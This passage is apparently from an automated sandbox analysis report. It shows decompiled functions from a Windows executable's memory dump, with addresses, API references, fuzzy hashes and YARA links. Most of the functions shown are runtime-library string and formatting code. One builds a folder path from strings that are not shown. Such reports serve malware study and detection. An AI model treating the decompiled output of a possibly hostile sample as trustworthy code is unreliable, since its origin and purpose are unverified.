				return E0042A36A(E0040B3B0(__ebx, __edi, _t38, 0x443c1c,  &_v1008), __ebx, _v8 ^ _t33,  &_v2008, __edi, __esi,  &_v1008);
			}

0x0040b7e0
0x0040b7e9
0x0040b7f0
0x0040b801
0x0040b814
0x0040b819
0x0040b82a
0x0040b842
0x0040b856
0x0040b87d

APIs

_memset.LIBCMT ref: 0040B801
_memset.LIBCMT ref: 0040B814
lstrcat.KERNEL32(?,025C8AF8), ref: 0040B82A

Part of subcall function 00420650: _memset.LIBCMT ref: 00420671
Part of subcall function 00420650: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 0042068A

lstrcat.KERNEL32(?,00000000), ref: 0040B842
lstrcat.KERNEL32(?,?), ref: 0040B856

Part of subcall function 0040B3B0: _memset.LIBCMT ref: 0040B3D9
Part of subcall function 0040B3B0: _memset.LIBCMT ref: 0040B3EC
Part of subcall function 0040B3B0: _memset.LIBCMT ref: 0040B3FF
Part of subcall function 0040B3B0: _memset.LIBCMT ref: 0040B412
Part of subcall function 0040B3B0: _memset.LIBCMT ref: 0040B425
Part of subcall function 0040B3B0: _memset.LIBCMT ref: 0040B438
Part of subcall function 0040B3B0: _memset.LIBCMT ref: 0040B44E
Part of subcall function 0040B3B0: _memset.LIBCMT ref: 0040B461
Part of subcall function 0040B3B0: _memset.LIBCMT ref: 0040B474
Part of subcall function 0040B3B0: lstrcat.KERNEL32(?,025C86E0), ref: 0040B489
Part of subcall function 0040B3B0: lstrcat.KERNEL32(?,025C8C18), ref: 0040B49D
Part of subcall function 0040B3B0: lstrcat.KERNEL32(?,025C8730), ref: 0040B4B1
Part of subcall function 0040B3B0: lstrcat.KERNEL32(?,025C0598), ref: 0040B4C4
Part of subcall function 0040B3B0: lstrcat.KERNEL32(?,025C8B70), ref: 0040B4D8
Part of subcall function 0040B3B0: lstrcat.KERNEL32(?,?), ref: 0040B4E6
Part of subcall function 0040B3B0: lstrcat.KERNEL32(?,00443C68), ref: 0040B4F8
Part of subcall function 0040B3B0: lstrcat.KERNEL32(?,?), ref: 0040B50C
Part of subcall function 0040B3B0: lstrcat.KERNEL32(?,00443C68), ref: 0040B51E

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _memsetlstrcat$FolderPath
String ID:
API String ID: 48314839-0
Opcode ID: df9fc98068579c28323c72a8e8b2eb6a777d9262a60ee838c924e9325bfd650f
Instruction ID: 214bb3a5fdcdb9e897095b619650df5448bffacfebe778425eb4f8f0a7610235
Opcode Fuzzy Hash: df9fc98068579c28323c72a8e8b2eb6a777d9262a60ee838c924e9325bfd650f
Instruction Fuzzy Hash: 2101F971E0020CA7CB10EBA0EC46F9E73BCEF44705F4045AAF609671C1EA74A7458F99

Uniqueness

Uniqueness Score: -1.00%

Function 00433200 Relevance: 7.5, APIs: 5, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00433200(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x44d508);
				E00433750(__ebx, __edi, __esi);
				_t28 = E004324B4(__ebx, __edx, _t31);
				_t12 =  *0x4528e0; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E00433F2B(_t20, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E004331B3(_t29,  *0x452b28);
					 *(_t30 - 4) = 0xfffffffe;
					E0043326D();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E004324B4(_t20, __edx, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E0043110E(_t25, _t34);
				}
				return E00433795(_t29);
			}

0x00433200
0x00433200
0x00433200
0x00433200
0x00433200
0x00433202
0x00433207
0x00433211
0x00433213
0x0043321b
0x0043323f
0x00433241
0x00433247
0x00433251
0x0043325c
0x0043325f
0x00433266
0x0043321d
0x0043321d
0x00433221
0x00000000
0x00433223
0x00433228
0x00433228
0x00433221
0x0043322b
0x0043322d
0x0043322f
0x00433231
0x00433236
0x0043323e

APIs

__getptd.LIBCMT ref: 0043320C

Part of subcall function 004324B4: __getptd_noexit.LIBCMT ref: 004324B7
Part of subcall function 004324B4: __amsg_exit.LIBCMT ref: 004324C4

__getptd.LIBCMT ref: 00433223
__amsg_exit.LIBCMT ref: 00433231
__lock.LIBCMT ref: 00433241
__updatetlocinfoEx_nolock.LIBCMT ref: 00433255

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: f107a104281f7bbe5accdd2aea1be58761297bcf4190fdf6d2baa027511008bd
Instruction ID: 033cb14cfeb4d429208c0a7e590f382f307586efcbcc17bb78916ff23be3fcd0
Opcode Fuzzy Hash: f107a104281f7bbe5accdd2aea1be58761297bcf4190fdf6d2baa027511008bd
Instruction Fuzzy Hash: 8AF096319047109BEA25BF69690274E32A06F0C73AF10624FF440A72D2CBAC5B009A5E

Uniqueness

Uniqueness Score: -1.00%

Function 00423150 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 177
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00423150(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed long long _a24) {
				signed int _v8;
				char _v14;
				char _v15;
				long _v16;
				long _v124;
				char _v125;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t60;
				signed int _t63;
				signed char _t66;
				short* _t67;
				intOrPtr _t75;
				signed int _t77;
				char _t79;
				signed int _t85;
				signed int _t86;
				signed int _t90;
				intOrPtr _t91;
				void* _t92;
				signed int _t94;
				void* _t95;
				signed int _t98;
				void* _t102;
				signed int _t108;
				signed int _t112;
				signed long long _t120;

				_t60 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t60 ^ _t94;
				_t75 = _a16;
				_t91 =  *((intOrPtr*)(_t75 + 0x18));
				_v140 = _a4;
				_t63 =  *(_t75 + 0x1c);
				_t90 = 0;
				_v144 = __ecx;
				_t98 = _t63;
				if(_t98 <= 0 && (_t98 < 0 || _t91 <= 0) && ( *(_t75 + 0x14) & 0x00002000) == 0) {
					_t91 = 6;
					_t63 = 0;
				}
				_t77 = _t63;
				_t102 = _t77 - _t90;
				if(_t102 < 0 || _t102 <= 0 && _t91 <= 0x24) {
					_v136 = _t91;
				} else {
					_v136 = 0x24;
				}
				asm("cdq");
				_t92 = _t91 - _v136;
				asm("sbb ecx, edx");
				_t85 =  *(_t75 + 0x14);
				_t66 = _t85 & 0x00003000;
				_v132 = _t90;
				if(_t66 != 0x2000) {
					_t120 = _a24;
					goto L36;
				} else {
					asm("fldz");
					asm("fcom st0, st1");
					asm("fnstsw ax");
					if((_t66 & 0x00000005) != 0) {
						_v125 = 0;
					} else {
						_v125 = 1;
						asm("fchs");
					}
					asm("fcom st0, st1");
					asm("fnstsw ax");
					_t120 =  *0x446ba0;
					if((_t66 & 0x00000041) != 0) {
						while(1) {
							__eflags = _v132 - 0x1388;
							if(__eflags >= 0) {
								goto L14;
							}
							_t120 = _t120 / st0;
							_v132 = _v132 + 0xa;
							asm("fxch st0, st1");
							asm("fcom st0, st2");
							asm("fnstsw ax");
							__eflags = _t66 & 0x00000041;
							if(__eflags != 0) {
								asm("fxch st0, st1");
								continue;
							}
							st0 = _t120;
							goto L20;
						}
						goto L14;
					} else {
						L14:
						st1 = _t120;
						L20:
						asm("fxch st0, st2");
						asm("fcomp st0, st1");
						asm("fnstsw ax");
						if((_t66 & 0x00000005) != 0) {
							L32:
							st1 = _t120;
							if(_v125 != 0) {
								asm("fchs");
							}
							L36:
							_v16 = 0x25;
							_t67 =  &_v15;
							if((_t85 & 0x00000020) != 0) {
								_v15 = 0x2b;
								_t67 =  &_v14;
							}
							if((_t85 & 0x00000010) != 0) {
								 *_t67 = 0x23;
								_t67 = _t67 + 1;
							}
							_t86 = _t85 & 0x00003000;
							 *_t67 = 0x2a2e;
							 *((char*)(_t67 + 2)) = 0x4c;
							_t118 = _t86 - 0x2000;
							if(_t86 != 0x2000) {
								__eflags = _t86 - 0x3000;
								if(__eflags != 0) {
									__eflags = _t86 - 0x1000;
									_t44 = _t86 != 0x1000;
									__eflags = _t44;
									_t79 = (_t77 & 0xffffff00 | _t44) + (_t77 & 0xffffff00 | _t44) + 0x65;
								} else {
									_t79 = 0x61;
								}
							} else {
								_t79 = 0x66;
							}
							 *((char*)(_t67 + 3)) = _t79;
							 *(_t95 - 8) = _t120;
							 *((char*)(_t67 + 4)) = 0;
							E00422220(_t118, _v144, _v140, _a8, _a12, _t75, _a20,  &_v124, _v132, _t90, _t92, swprintf( &_v124, 0x6c,  &_v16, _v136));
							return E0042A36A(_v140, _t75, _v8 ^ _t94, _a8, _t90, _v140);
						}
						_t108 = _t77;
						if(_t108 >= 0 && (_t108 > 0 || _t92 >= 0xa)) {
							_t120 =  *0x446b98;
							while(1) {
								asm("fcom st0, st1");
								asm("fnstsw ax");
								if((_t66 & 0x00000001) != 0 || _t90 >= 0x1388) {
									break;
								}
								_t92 = _t92 + 0xfffffff6;
								asm("fxch st0, st1");
								asm("adc ecx, 0xffffffff");
								_t120 = _t120 * st2;
								_t90 = _t90 + 0xa;
								_t112 = _t77;
								if(_t112 > 0 || _t112 >= 0 && _t92 >= 0xa) {
									asm("fxch st0, st1");
									continue;
								} else {
									st1 = _t120;
									goto L32;
								}
							}
							st0 = _t120;
						}
						goto L32;
					}
				}
			}

0x00423159
0x00423160
0x00423167
0x0042316b
0x0042316f
0x00423175
0x00423178
0x0042317a
0x00423180
0x00423182
0x00423193
0x00423198
0x00423198
0x0042319a
0x0042319c
0x0042319e
0x004231b3
0x004231a7
0x004231a7
0x004231a7
0x004231bf
0x004231c0
0x004231c2
0x004231c4
0x004231c9
0x004231ce
0x004231d6
0x00423288
0x00000000
0x004231dc
0x004231dc
0x004231e1
0x004231e3
0x004231e8
0x00423209
0x004231ea
0x004231ea
0x004231ee
0x004231ee
0x004231f6
0x004231f8
0x004231fa
0x00423203
0x00423211
0x00423211
0x00423218
0x00000000
0x00000000
0x0042321a
0x0042321c
0x00423220
0x00423222
0x00423224
0x00423226
0x00423229
0x0042320f
0x00000000
0x0042320f
0x0042322b
0x00000000
0x0042322b
0x00000000
0x00423205
0x00423205
0x00423205
0x0042322d
0x0042322d
0x0042322f
0x00423231
0x00423236
0x00423278
0x0042327c
0x0042327e
0x00423280
0x00423280
0x0042328b
0x0042328b
0x0042328f
0x00423295
0x00423297
0x0042329b
0x0042329b
0x004232a1
0x004232a3
0x004232a6
0x004232a6
0x004232a7
0x004232ad
0x004232b2
0x004232b6
0x004232bc
0x004232c2
0x004232c8
0x004232ce
0x004232d4
0x004232d4
0x004232d7
0x004232ca
0x004232ca
0x004232ca
0x004232be
0x004232be
0x004232be
0x004232de
0x004232e1
0x004232ef
0x00423324
0x0042333e
0x0042333e
0x00423238
0x0042323a
0x00423243
0x0042324d
0x0042324d
0x0042324f
0x00423254
0x00000000
0x00000000
0x0042325e
0x00423261
0x00423263
0x00423266
0x00423268
0x0042326b
0x0042326d
0x0042324b
0x00000000
0x00423276
0x00423276
0x00000000
0x00423276
0x0042326d
0x00423284
0x00423284
0x00000000
0x0042323a
0x00423203

APIs

swprintf.LIBCMT ref: 004232F9

Strings

$, xrefs: 004231A7
+, xrefs: 00423297
%, xrefs: 0042328B

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: swprintf
String ID: $$%$+
API String ID: 233258989-3202472541
Opcode ID: 3ddebb8cb6a9bb9dacbcffd0b09a7e06b98138e3a2fea8e819ac9486c7b03a70
Instruction ID: 40ed03a7a6dd72eb29961c0c92da58ea689dfd4f18d69c55ffc97d2dfa0ed5bd
Opcode Fuzzy Hash: 3ddebb8cb6a9bb9dacbcffd0b09a7e06b98138e3a2fea8e819ac9486c7b03a70
Instruction Fuzzy Hash: D8515B72F00224DADF15CE98E9447DE7BB4FB01701F6085CBD841A3296D73C4E558BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004122B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004122B0(intOrPtr* __ecx, intOrPtr* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr* _t22;
				short* _t28;
				signed int _t38;
				void* _t39;
				intOrPtr* _t41;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr* _t60;

				_t38 = _a8;
				_t60 = __ecx;
				_t41 = _a4;
				_t52 =  *((intOrPtr*)(_t41 + 0x10));
				if(_t52 < _t38) {
					E004297E6("invalid string position");
				}
				_t19 = _a12;
				_t53 = _t52 - _t38;
				if(_t19 < _t53) {
					_t53 = _t19;
				}
				if(_t60 != _t41) {
					if(_t53 > 0x7ffffffe) {
						E00429799("string too long");
					}
					_t20 =  *((intOrPtr*)(_t60 + 0x14));
					if(_t20 >= _t53) {
						if(_t53 != 0) {
							goto L10;
						} else {
							 *((intOrPtr*)(_t60 + 0x10)) = _t53;
							if(_t20 < 8) {
								_t28 = _t60;
								 *_t28 = 0;
								return _t28;
							} else {
								 *((short*)( *_t60)) = 0;
								return _t60;
							}
						}
					} else {
						E00412130(_t60, _t53,  *((intOrPtr*)(_t60 + 0x10)));
						_t41 = _a4;
						if(_t53 == 0) {
							L22:
							return _t60;
						} else {
							L10:
							if( *((intOrPtr*)(_t41 + 0x14)) >= 8) {
								_t41 =  *_t41;
							}
							if( *((intOrPtr*)(_t60 + 0x14)) < 8) {
								_t22 = _t60;
							} else {
								_t22 =  *_t60;
							}
							_t39 = _t53 + _t53;
							E0042B8D0(_t22, _t41 + _a8 * 2, _t39);
							 *((intOrPtr*)(_t60 + 0x10)) = _t53;
							if( *((intOrPtr*)(_t60 + 0x14)) < 8) {
								 *((short*)(_t39 + _t60)) = 0;
								goto L22;
							} else {
								 *((short*)(_t39 +  *_t60)) = 0;
								return _t60;
							}
						}
					}
				} else {
					E004120A0(_t60, _t53 + _t38, 0xffffffff);
					E004120A0(_t60, 0, _t38);
					return _t60;
				}
			}

0x004122b4
0x004122b8
0x004122ba
0x004122be
0x004122c3
0x004122ca
0x004122ca
0x004122cf
0x004122d2
0x004122d6
0x004122d8
0x004122d8
0x004122dc
0x00412303
0x0041230a
0x0041230a
0x0041230f
0x00412314
0x00412340
0x00000000
0x00412342
0x00412342
0x00412348
0x0041235b
0x00412360
0x00412365
0x0041234a
0x0041234f
0x00412357
0x00412357
0x00412348
0x00412316
0x0041231d
0x00412322
0x00412327
0x004123a0
0x004123a6
0x00412329
0x00412329
0x00412331
0x00412333
0x00412333
0x00412338
0x00412368
0x0041233a
0x0041233a
0x0041233a
0x0041236d
0x00412376
0x00412382
0x00412385
0x0041239c
0x00000000
0x00412387
0x0041238b
0x00412395
0x00412395
0x00412385
0x00412327
0x004122de
0x004122e5
0x004122ef
0x004122fa
0x004122fa

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004122CA

Part of subcall function 004297E6: std::exception::exception.LIBCMT ref: 004297FB
Part of subcall function 004297E6: __CxxThrowException@8.LIBCMT ref: 00429810
Part of subcall function 004297E6: std::exception::exception.LIBCMT ref: 00429821

std::_Xinvalid_argument.LIBCPMT ref: 0041230A

Part of subcall function 00429799: std::exception::exception.LIBCMT ref: 004297AE
Part of subcall function 00429799: __CxxThrowException@8.LIBCMT ref: 004297C3
Part of subcall function 00429799: std::exception::exception.LIBCMT ref: 004297D4

Strings

string too long, xrefs: 00412305
invalid string position, xrefs: 004122C5

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: d1b7d2ad74206f365d5f772940d3af469c006841bfbded8eaaa8c59ebf1ae954
Instruction ID: 1f31f75babdf52f99647b7a09fdae397bb1ea36981630832827a19923e5b1576
Opcode Fuzzy Hash: d1b7d2ad74206f365d5f772940d3af469c006841bfbded8eaaa8c59ebf1ae954
Instruction Fuzzy Hash: 6131E7333042189B9710DE6DEA809AEF3AAEFE5725720052FF415C7250DAB99D9187A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404AD0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404AD0(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr* _t18;
				char* _t24;
				intOrPtr _t34;
				intOrPtr* _t36;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr* _t50;

				_t34 = _a8;
				_t50 = __ecx;
				_t36 = _a4;
				_t42 =  *((intOrPtr*)(_t36 + 0x10));
				if(_t42 < _t34) {
					E004297E6("invalid string position");
				}
				_t15 = _a12;
				_t43 = _t42 - _t34;
				if(_t15 < _t43) {
					_t43 = _t15;
				}
				if(_t50 != _t36) {
					if(_t43 > 0xfffffffe) {
						E00429799("string too long");
					}
					_t16 =  *((intOrPtr*)(_t50 + 0x14));
					if(_t16 >= _t43) {
						if(_t43 != 0) {
							goto L10;
						} else {
							 *((intOrPtr*)(_t50 + 0x10)) = _t43;
							if(_t16 < 0x10) {
								_t24 = _t50;
								 *_t24 = 0;
								return _t24;
							} else {
								 *((char*)( *_t50)) = 0;
								return _t50;
							}
						}
					} else {
						E004044F0(_t50, _t43,  *((intOrPtr*)(_t50 + 0x10)));
						_t36 = _a4;
						if(_t43 == 0) {
							L22:
							return _t50;
						} else {
							L10:
							if( *((intOrPtr*)(_t36 + 0x14)) >= 0x10) {
								_t36 =  *_t36;
							}
							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
								_t18 = _t50;
							} else {
								_t18 =  *_t50;
							}
							E0042B8D0(_t18, _t36 + _t34, _t43);
							 *((intOrPtr*)(_t50 + 0x10)) = _t43;
							if( *((intOrPtr*)(_t50 + 0x14)) < 0x10) {
								 *((char*)(_t50 + _t43)) = 0;
								goto L22;
							} else {
								 *((char*)( *_t50 + _t43)) = 0;
								return _t50;
							}
						}
					}
				} else {
					E00404410(_t50, _t43 + _t34, 0xffffffff);
					E00404410(_t50, 0, _t34);
					return _t50;
				}
			}

0x00404ad4
0x00404ad8
0x00404ada
0x00404ade
0x00404ae3
0x00404aea
0x00404aea
0x00404aef
0x00404af2
0x00404af6
0x00404af8
0x00404af8
0x00404afc
0x00404b20
0x00404b27
0x00404b27
0x00404b2c
0x00404b31
0x00404b5d
0x00000000
0x00404b5f
0x00404b5f
0x00404b65
0x00404b76
0x00404b79
0x00404b7e
0x00404b67
0x00404b6a
0x00404b72
0x00404b72
0x00404b65
0x00404b33
0x00404b3a
0x00404b3f
0x00404b44
0x00404bae
0x00404bb4
0x00404b46
0x00404b46
0x00404b4e
0x00404b50
0x00404b50
0x00404b55
0x00404b81
0x00404b57
0x00404b57
0x00404b57
0x00404b88
0x00404b94
0x00404b97
0x00404baa
0x00000000
0x00404b99
0x00404b9b
0x00404ba5
0x00404ba5
0x00404b97
0x00404b44
0x00404afe
0x00404b05
0x00404b0f
0x00404b1a
0x00404b1a

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404AEA

Part of subcall function 004297E6: std::exception::exception.LIBCMT ref: 004297FB
Part of subcall function 004297E6: __CxxThrowException@8.LIBCMT ref: 00429810
Part of subcall function 004297E6: std::exception::exception.LIBCMT ref: 00429821

std::_Xinvalid_argument.LIBCPMT ref: 00404B27

Part of subcall function 00429799: std::exception::exception.LIBCMT ref: 004297AE
Part of subcall function 00429799: __CxxThrowException@8.LIBCMT ref: 004297C3
Part of subcall function 00429799: std::exception::exception.LIBCMT ref: 004297D4

Strings

string too long, xrefs: 00404B22
invalid string position, xrefs: 00404AE5

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: 56208ece4c47443ecee6e9ed70c17835b87c5a2803a37b17b0412857839027d4
Instruction ID: 3e2b6d01700faedd337e64e46f8e4837f6b4b769e58c3906980e11c02702a603
Opcode Fuzzy Hash: 56208ece4c47443ecee6e9ed70c17835b87c5a2803a37b17b0412857839027d4
Instruction Fuzzy Hash: FB31C5733002109BD7209E5DE880B5AF7A9DBE1765F20093FF655DB2D1C679EC4087A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040A74D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040A74D(signed int __ecx, signed int __edi) {
				intOrPtr* _t26;
				signed int _t28;
				signed int _t31;
				char _t39;
				signed int _t41;
				signed int _t47;
				signed int _t49;
				void* _t51;

				_t47 = __edi;
				_t41 = __ecx;
				_t49 =  *(_t51 - 0x14);
				if( *(_t49 + 0x14) >= 0x10) {
					_push( *__esi);
					E0042A289();
					__esp = __esp + 4;
				}
				 *(_t49 + 0x14) = 0xf;
				 *(_t49 + 0x10) = 0;
				 *_t49 = 0;
				E0042C5C1(0, 0);
				L12:
				while(1) {
					if(_t47 != 0) {
						L8:
						_t41 =  *(_t49 + 0x10);
						if( *(_t49 + 0x14) < 0x10) {
							_t28 = _t49;
						} else {
							_t28 =  *_t49;
						}
						 *((char*)(_t28 + _t41)) = _t39;
						 *(_t49 + 0x10) = _t47;
						if( *(_t49 + 0x14) < 0x10) {
							 *((char*)(_t49 + _t47)) = 0;
							goto L20;
						} else {
							 *((char*)( *_t49 + _t47)) = 0;
							_t26 =  *((intOrPtr*)(_t51 + 8)) + 1;
							 *((intOrPtr*)(_t51 + 8)) = _t26;
							L1:
							if(_t26 ==  *((intOrPtr*)(_t51 + 0xc))) {
								 *[fs:0x0] =  *((intOrPtr*)(_t51 - 0xc));
								return _t26;
							}
							_t39 =  *_t26;
							_t31 =  *(_t49 + 0x10);
							if((_t41 | 0xffffffff) - _t31 <= 1) {
								_t31 = E00429799("string too long");
							}
							_t5 = _t31 + 1; // 0x1
							_t47 = _t5;
							if(_t47 > 0xfffffffe) {
								_t31 = E00429799("string too long");
							}
							_t41 =  *(_t49 + 0x14);
							if(_t41 >= _t47) {
								continue;
							} else {
								_t41 = _t49;
								E004044F0(_t41, _t47, _t31);
								if(_t47 == 0) {
									L20:
									_t26 =  *((intOrPtr*)(_t51 + 8)) + 1;
									 *((intOrPtr*)(_t51 + 8)) = _t26;
									goto L1;
								}
								goto L8;
							}
						}
					}
					 *(_t49 + 0x10) = _t47;
					if(_t41 < 0x10) {
						 *_t49 = 0;
						_t26 =  *((intOrPtr*)(_t51 + 8)) + 1;
						 *((intOrPtr*)(_t51 + 8)) = _t26;
					} else {
						 *( *_t49) = 0;
						_t26 =  *((intOrPtr*)(_t51 + 8)) + 1;
						 *((intOrPtr*)(_t51 + 8)) = _t26;
					}
					goto L1;
				}
			}

0x0040a74d
0x0040a74d
0x0040a74d
0x0040a754
0x0040a758
0x0040a759
0x0040a75e
0x0040a75e
0x0040a763
0x0040a76a
0x0040a773
0x0040a776
0x00000000
0x0040a77b
0x0040a77d
0x0040a73c
0x0040a73c
0x0040a747
0x0040a7a9
0x0040a749
0x0040a749
0x0040a749
0x0040a7ab
0x0040a7ae
0x0040a7b4
0x0040a7ca
0x00000000
0x0040a7b6
0x0040a7b8
0x0040a7bf
0x0040a7c0
0x0040a6f0
0x0040a6f3
0x0040a7dd
0x0040a7eb
0x0040a7eb
0x0040a6f9
0x0040a6fb
0x0040a706
0x0040a70d
0x0040a70d
0x0040a712
0x0040a712
0x0040a718
0x0040a71f
0x0040a71f
0x0040a724
0x0040a729
0x00000000
0x0040a72b
0x0040a72d
0x0040a72f
0x0040a736
0x0040a7ce
0x0040a7d1
0x0040a7d2
0x00000000
0x0040a7d2
0x00000000
0x0040a736
0x0040a729
0x0040a7b4
0x0040a77f
0x0040a785
0x0040a79a
0x0040a7a0
0x0040a7a1
0x0040a787
0x0040a789
0x0040a78f
0x0040a790
0x0040a790
0x00000000
0x0040a785

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040A70D
std::_Xinvalid_argument.LIBCPMT ref: 0040A71F
__CxxThrowException@8.LIBCMT ref: 0040A776

Strings

string too long, xrefs: 0040A708, 0040A71A

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throw
String ID: string too long
API String ID: 2310008865-2556327735
Opcode ID: f52319edd008c3fa9098174aa931c60d02b1982517e1860c3082b45369843cab
Instruction ID: 9ec181e44863301e245cb059e5d706305dcab421cb892c69842c09a60ee09fcb
Opcode Fuzzy Hash: f52319edd008c3fa9098174aa931c60d02b1982517e1860c3082b45369843cab
Instruction Fuzzy Hash: 5921BE342007009FD725DF28D591B2A77F1AF92700F208A2EE4926B7C1C779E94487AB

Uniqueness

Uniqueness Score: -1.00%

Function 004210C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E004210C8() {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				void* __edi;
				signed int _t21;
				void* _t28;
				intOrPtr* _t29;
				void* _t36;
				intOrPtr* _t39;
				signed int _t44;

				_t29 = _v24;
				E00420F70(_t29);
				E0042C5C1(0, 0);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_push(0xffffffff);
				_push(E0043F6DB);
				_push( *[fs:0x0]);
				_push(_t29);
				_push(_t36);
				_t21 =  *0x451f00; // 0xc21d6f0a
				_push(_t21 ^ _t44);
				 *[fs:0x0] =  &_v16;
				_t39 = _t29 + 0x50;
				_v20 = _t39;
				 *((intOrPtr*)( *((intOrPtr*)( *_t29 + 4)) + _t39 - 0x50)) = 0x446b24;
				_v8 = 0;
				 *((intOrPtr*)(_t39 - 0x4c)) = 0x446ae4;
				E004209E0(_t39 - 0x4c);
				E00418260(_t39 - 0x4c, _t36);
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t39 - 0x50)) + 4)) + _t39 - 0x50)) = 0x446ad0;
				_v8 = 0xffffffff;
				 *_t39 = 0x445de4;
				_t28 = E00429F19(_t39);
				 *[fs:0x0] = _v16;
				return _t28;
			}

0x004210c8
0x004210cb
0x004210d4
0x004210d9
0x004210da
0x004210db
0x004210dc
0x004210dd
0x004210de
0x004210df
0x004210e3
0x004210e5
0x004210f0
0x004210f1
0x004210f3
0x004210f4
0x004210fb
0x004210ff
0x00421107
0x0042110d
0x00421110
0x0042111b
0x00421122
0x00421129
0x00421131
0x0042113c
0x00421145
0x0042114c
0x00421152
0x0042115d
0x0042116a

APIs

__CxxThrowException@8.LIBCMT ref: 004210D4

Part of subcall function 0042C5C1: RaiseException.KERNEL32(?,?,0042C5C0,?,?,?,?,?,0042C5C0,?,0044B220,00464BA8), ref: 0042C603

Part of subcall function 00418260: std::_Lockit::_Lockit.LIBCPMT ref: 00418286

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00421152

Part of subcall function 00429F19: std::ios_base::_Tidy.LIBCPMT ref: 00429F3A

Strings

PMA, xrefs: 0042114C
B, xrefs: 0042113C

Memory Dump Source

